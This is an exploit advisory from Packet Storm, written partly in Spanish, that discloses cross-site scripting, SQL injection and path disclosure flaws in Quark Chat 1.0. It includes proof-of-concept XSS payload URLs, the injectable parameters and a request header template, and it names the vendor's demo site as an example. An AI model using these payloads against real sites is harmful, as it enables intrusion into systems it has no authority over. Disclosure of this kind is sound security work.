Quark Chat 1.0 XSS / SQL Injection / Path Disclosure

2013-08-15T00:00:00
ID PACKETSTORM:122834
Type packetstorm
Reporter Dylan Irzi
Modified 2013-08-15T00:00:00

Description

                                        
                                            `###########################################################################################  
# Exploit Title: Quark Chat 1.0 - XSS / SQL Injection / Path Diclosure  
# Date: 15 de Agosto del 2013  
# Exploit Author: Dylan Irzi  
# Credit goes for: websecuritydev.com  
# Vendor Homepage: http://www.quack-chat.com/  
# Tested on: Win8 & Linux Mint  
# Affected Version : 1.0  
# Contacts: { https://twitter.com/Dylan_irzi11 , http://websecuritydev.com/}  
# Greetz: All team WebSecuritydev.  
###########################################################################################  
  
Cross Site Scripting:  
Archivos Afectados Afectados  
  
qchat.php  
qc_admin/index.php?p=history  
  
PoC:  
localhost/qchat.php  
Vector: ""><img src=x onerror=prompt(/XSS/);>>  
  
Input:  
<input id="name" type="text" style="width:200px;" name="name">  
Is Reflected: localhost/qc_admin/index.php?p=history  
  
PoC #2:  
localhost/qc_admin/index.php?p=history&page=2+(XSS Vector)  
Example:  
localhost/qc_admin/index.php?p=history&page=2%22%22%3E%3Cimg%20src=x%20onerror=prompt%28/XSS/%29;%3E%3E  
  
-------------------------------------------------------------------  
SQL Injection  
  
localhost/qc_admin/index.php?p=history&id=(SQL Injection)  
localhost/qc_admin/index.php?p=history&page=(SQL Injection)  
  
Accept: */*  
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET  
CLR 2.0.50727)  
Cookie: PHPSESSID=7d87f318548027737ae3893189e2ff0e  
  
(Remplazar por una Session Cookie Valida)  
  
-------------------------------------------------------------------  
Path Diclosure  
  
localhost/qc_admin/index.php?p=history&id='  
  
in /var/www/chat/qc_admin/index.php on line 249  
  
-------------------------------------------------------------------  
  
Example:  
http://www.quack-chat.com/demo.php  
--------------------------------------------------------------------  
  
*By Dylan Irzi  
@Dylan_Irzi11  
Pentest de Seguridad.  
  
*  
`